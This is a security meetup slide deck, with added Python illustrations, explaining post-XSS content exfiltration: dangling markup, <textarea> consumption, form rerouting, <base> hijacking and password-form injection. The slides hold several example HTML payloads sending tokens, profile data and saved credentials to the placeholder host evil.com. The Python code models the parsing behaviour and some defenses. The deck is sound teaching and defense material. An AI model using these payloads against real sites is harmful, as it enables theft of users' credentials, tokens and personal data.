Postcards from the post-XSS world- Content Exfiltration technique.
1. Postcards from the post-XSS world - Content Exfiltration technique.
   By: Piyush Pattanayak
   Null Chennai Meet
2. Introduction to XSS
   • A type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites.
   • Occurs when an attacker uses a web application to send malicious code, generally in the form of a client-side script, to a different end user.
   • The flaws that allow these attacks to succeed are prevalent in most web applications that take user input and generate output without adequate validation or encoding of that input.
   • An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way of determining that the script should not be trusted, and will execute it.
   • This gives the malicious script access to cookies and other sensitive information retained by the browser for use by the site. Such scripts can also rewrite the HTML content.
3. How to test for XSS
   • XSS should be tested for in anything that accepts user input and displays it in the web page after rendering. XSS attacks succeed because most programmers do not apply HTML encoding to user input, trusting it as received.
   • E.g.: if a user enters "<script>alert(document.cookie)</script>" in a text field, it may be rendered as a script tag upon submission, producing a popup alert that shows the cookies.
   • There are plenty of other XSS vectors, and more information about XSS, which you can find at OWASP.
4. Introduction to Post-XSS
   • What?
     – Very similar to XSS.
   • Why post-XSS?
     – Browser-level efforts to improve the security of web applications focus on the containment of attacker-originating scripts.
     – Content Security Policy removes the ability to inline JavaScript code in a protected HTML document.
     – Whitelisting of permissible sources for any externally-loaded scripts.
     – Related approaches, such as the NoScript add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note.
5. Content Exfiltration
   • The goal of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application.
   • Historically, XSS exploits sought to obtain HTTP (session) cookies.
   • The introduction of HttpOnly cookies greatly limited this possibility.
   • In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following:
     – Personal data
     – Tokens used to defend against cross-site request forgery attacks
     – Capability-bearing URLs
6. Several Exfiltration Strategies
   • Dangling markup injection
   • <textarea>-based consumption
   • Rerouting of existing forms
   • Use of <base> to hijack relative URLs
   • Form injection to intercept browser-managed passwords
   • The limits of exfiltration defenses
7. 1. Dangling markup injection
   • Injection of non-terminated markup, which consumes a significant portion of the subsequent HTML syntax until the expected terminating sequence is encountered.
   • Opposite quote: the injected attribute is opened with a quote character different from the one used around the sensitive data, so the value is not terminated before that data has been consumed.
   • Scenario: we are allowed to inject anything into the HTML content above the sensitive data we need to steal.
   • Example:
     – <img src='http://evil.com/log.cgi?                      ← Injected line with a non-terminated parameter
       ...
       <input type="hidden" name="xsrf_token" value="12345">
       ...
       '                                                       ← Normally-occurring apostrophe in page text
       ...
       </div>
   http://nullcon.net/
8. Dangling markup injection cont.
   • Limitation: the injection point has to appear before the sensitive data to be extracted.
   • If governed by pure chance, this condition will be met in 50% of all cases.
   • Demo: Dangling Markup Injection
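As an added illustration (not from the slides), the following Python models the consumption described in the dangling markup slides: it renders a constructed profile page with the unterminated <img src=' payload, recovers the query string the browser would send to evil.com, and shows that HTML-encoding the reflected value (html.escape) keeps the attribute from ever opening. The page template, its text and the shop page are constructed for the example.

```python
import html
import re

# Constructed sample: a profile page whose template reflects a user-supplied
# display name, followed by a CSRF token and ordinary text that happens to
# contain an apostrophe (the terminator the attack depends on).
PAGE_TEMPLATE = """<div class="profile">
<p>Hello, {name}</p>
<form action="/update_profile.php">
<input type="hidden" name="xsrf_token" value="12345">
</form>
<p>Here's your recent activity.</p>
</div>"""

# The slide's payload: an <img> whose src attribute is opened with an
# apostrophe and never closed.
INJECTED_NAME = "<img src='http://evil.com/log.cgi?"

def render(name, encode):
    """Vulnerable rendering (encode=False) versus context-aware output encoding,
    which turns < and ' into &lt; and &#x27; so no tag or attribute can open."""
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True) if encode else name)

def leaked_query(page):
    """Emulate the HTML5 tokenizer's single-quoted attribute value state: from
    src=' onward, every character up to the next apostrophe becomes the URL the
    browser requests. Returns the query string that would reach evil.com, or
    None when no dangling <img src=' exists in the page."""
    m = re.search(r"<img src='([^']*)'", page)
    if not m or "?" not in m.group(1):
        return None
    return m.group(1).split("?", 1)[1]
```

With encode=False the returned query contains the hidden xsrf_token field; with encode=True the payload is rendered as inert text and nothing is captured.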
9. 2. <textarea>-based consumption
   • The previous method had limitations, such as needing a matching quote character.
   • Injection of a <textarea>.
   • Scenario: a combination of single and double quotes is present before the sensitive data we want to steal.
   • Can be injected before or after the legitimate form tag.
   • Example:
     – <form action=http://evil.com/log.cgi><textarea>   ← Injected line
       ...
       <input type="hidden" name="xsrf_token" value='12345'>
       ...
       (EOF)
10. <textarea>-based consumption cont.
   • Limitation: in contrast to the previous method, a degree of user interaction is needed to exfiltrate the data.
   • The victim has to submit the form by some means.
   • Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers.
   • Demo: <textarea>-based consumption
11. 3. Rerouting of existing forms
   • This works because <form> tags cannot be nested.
   • Scenario: we can inject anything above an existing form tag.
   • This allows the attacker to change the action URL to which any existing form will be submitted.
   • Example:
     – <form action=http://evil.com/log.cgi>   ← Injected line
       ...
       <form action=update_profile.php>        ← Legitimate, pre-existing form
       ...
       <input type="text" name="real_name" value="John Q. Public">
       ...
       </form>
12. Rerouting of existing forms cont.
   • Interesting when used to target forms automatically populated with user-specific secrets.
   • Demo: Rerouting of existing forms
13. 4. <base> to hijack relative URLs
   • Injection of <base> tags.
   • Changes the semantics of all subsequently appearing relative URLs.
   • Scenario: we are allowed to insert on top of the form element.
   • Example:
     – <base href=http://evil.com/>   ← Injected line
       ...
       <form action=update_profile.php>   ← Legitimate, pre-existing form, which now resolves to:
       <form action=http://evil.com/update_profile.php>
       ...
       <input type="text" name="real_name" value="John Q. Public">
       ...
       </form>
14. <base> to hijack relative URLs cont.
   • Demo: <base> to hijack relative URLs
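Added example, not from the slides: a small Python resolver that models the two parser rules behind techniques 3 and 4 (a <form> start tag inside an already open form is ignored, and a relative action resolves against the first <base href>), reports where the legitimate form really submits, and applies the same-origin check that a CSP `form-action 'self'` directive enforces. The shop.example origin and the sample pages are constructed; evil.com is the slides' placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormResolver(HTMLParser):
    """Where will the browser really submit this page's form? Models two parser
    rules the slides rely on: a <form> start tag inside an open form is ignored
    (forms cannot nest), and relative actions resolve against the first <base href>."""
    def __init__(self, document_url):
        super().__init__()
        self.document_url = document_url
        self.base_href = None    # first <base href>, if any
        self.form_action = None  # action of the form that wins
        self.in_form = False
        self.fields = []         # input names the winning form will submit
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and self.base_href is None and "href" in attrs:
            self.base_href = attrs["href"]
        elif tag == "form":
            if self.in_form:
                return           # nested <form>: ignored, injected action stays
            self.in_form = True
            self.form_action = attrs.get("action") or ""
        elif tag == "input" and self.in_form and "name" in attrs:
            self.fields.append(attrs["name"])
    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False
    def submit_url(self):
        base = urljoin(self.document_url, self.base_href or "")
        return urljoin(base, self.form_action or "")

def same_origin(url, document_url):
    """The check CSP `form-action 'self'` enforces: submit to own origin only."""
    a, b = urlsplit(url), urlsplit(document_url)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)

def analyse(page, document_url="https://shop.example/profile"):
    p = FormResolver(document_url)
    p.feed(page)
    url = p.submit_url()
    return {"submit_url": url, "fields": p.fields, "same_origin": same_origin(url, document_url)}

# Constructed pages mirroring slides 11 and 13; shop.example is an assumed origin.
LEGIT_FORM = ('<form action=update_profile.php>\n'
              '<input type="text" name="real_name" value="John Q. Public">\n</form>')
REROUTED = "<form action=http://evil.com/log.cgi>\n" + LEGIT_FORM
BASE_HIJACKED = "<base href=http://evil.com/>\n" + LEGIT_FORM
```

analyse(REROUTED) and analyse(BASE_HIJACKED) both report an evil.com submit URL carrying the real_name field, which the same-origin check flags; the untouched LEGIT_FORM resolves to the shop's own update_profile.php.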
15. 5. Form injection to intercept browser-managed passwords
   • Browsers have features to remember usernames and passwords for websites.
   • Browsers auto-fill the fields after matching the domain and the id and name attributes of the fields.
   • We can inject a form into a domain using the previous exfiltration techniques to steal the user's credentials.
   • Example:
     – <form action="http://www.evil.com" method="POST">
       <input type="text" id="username" name="username">
       <input type="password" id="password" name="password">
       </form>
16. Form injection to intercept browser-managed passwords cont.
   • We can specify GET instead of POST and submit the credentials to a selected same-site destination.
   • That destination may link to third-party sites (thus leaking the credentials in the Referer header).
   • Or it may echo the parameters in the page.
17. 6. Addendum: The limits of exfiltration defenses
   • All the previous vectors redirect the data to an attacker-controlled domain.
   • A developer may therefore wish to restrict the set of permissible destinations for markup such as <form>, <a href=...> or <img> to their own domain.
   • However, any attempt to prevent exfiltration, even in script-less environments, is unlikely to succeed.
   • Exfiltration attempts do not have to be geared toward relaying the data to a third-party website.
   • Moving data from a private place to a public place, all within the scope of a single website, is also sufficient.
18. Addendum: The limits of exfiltration defenses cont.
   • Example:
     – <form action=/post_review.php>
       <input type=hidden name=review_body value="              ← Injected lines
       ...
       Your current shipping address:                            ← Existing page text to be exfiltrated
       123 Evergreen Terrace
       Springfield, USA
       ...
       <form action="/update_address.php">                       ← Existing form (ignored by the parser)
       ...
       <input type="hidden" name="xsrf_token" value="12345">     ← Token valid for /update_address.php and /post_review.php
       ...
       </form>
   • Demo: Addendum: The limits of exfiltration defenses
19. Reference
   • http://lcamtuf.coredump.cx/postxss/
20. Thank You
   Q&A